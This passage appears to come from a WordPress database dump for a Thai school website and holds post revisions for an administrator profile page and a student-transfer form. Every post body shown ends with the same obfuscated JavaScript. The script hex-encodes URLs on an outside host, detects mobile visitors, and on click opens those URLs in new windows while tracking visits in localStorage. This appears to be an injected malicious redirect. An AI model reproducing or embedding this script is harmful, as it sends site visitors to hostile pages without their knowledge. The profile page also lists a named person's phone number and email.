-->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ข้อมูลผู้บริหาร','','inherit','closed','closed','','469-revision-v1','','','2024-08-08 14:30:25','2024-08-08 07:30:25','',469,'http://pakhaeng.ssk.in.th/?p=692',0,'revision','',0),
(693,1,'2024-08-08 14:30:30','2024-08-08 07:30:30','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":690,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ผอ-1-2.png\" alt=\"\" class=\"wp-image-690\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:generateblocks/headline {\"uniqueId\":\"cbd5a9a5\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"30px\"},\"backgroundColor\":\"#f78da7\",\"textColor\":\"#ffffff\",\"highlightTextColor\":\"#7bdcb5\",\"iconColor\":\"#fcb900\"} -->\n<h2 class=\"gb-headline gb-headline-cbd5a9a5 gb-headline-text\">ผู้บริหารสถานศึกษา</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:paragraph -->\n<p><strong>ชื่อ-สกุล : </strong>นางเสน่หา  พลโสภา</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>ตำแหน่ง</strong> ผู้อำนวยการโรงเรียนบ้านหนองปลาเข็ง กอไหล่</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>โทรศัพท์</strong> :  093-325-2659</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>E-mail</strong> : phonsopha2509@gmail.com</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ข้อมูลผู้บริหาร','','inherit','closed','closed','','469-revision-v1','','','2024-08-08 14:30:30','2024-08-08 07:30:30','',469,'http://pakhaeng.ssk.in.th/?p=693',0,'revision','',0),
(695,1,'2024-08-08 14:59:01','2024-08-08 07:59:01','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"882f61c5\",\"blockVersion\":3} -->\n<h2 class=\"gb-headline gb-headline-882f61c5 gb-headline-text\">แบบคำขอการย้ายนักเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:paragraph -->\n<p>กรอกข้อมูล ในแบบฟอร์ม ให้ครบถ้วน แล้วทางโรงเรียนจะติดต่อกลับเพื่อ มารับคำขอย้ายโรงเรียน</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>หมายเหตุ : กรอกข้อมูลไม่ครบถ้วน ไม่รับพิจารณาขอย้าย</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://docs.google.com/forms/d/e/1FAIpQLSfTrFBwCoHyb8ISwfCACpe5sKpc1iodVua4jH3_yiG0DL0AEA/viewform?embedded=true\" width=\"640\" height=\"1899\" frameborder=\"0\" marginheight=\"0\" marginwidth=\"0\">กำลังโหลด…</iframe>\n<!-- /wp:html -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const 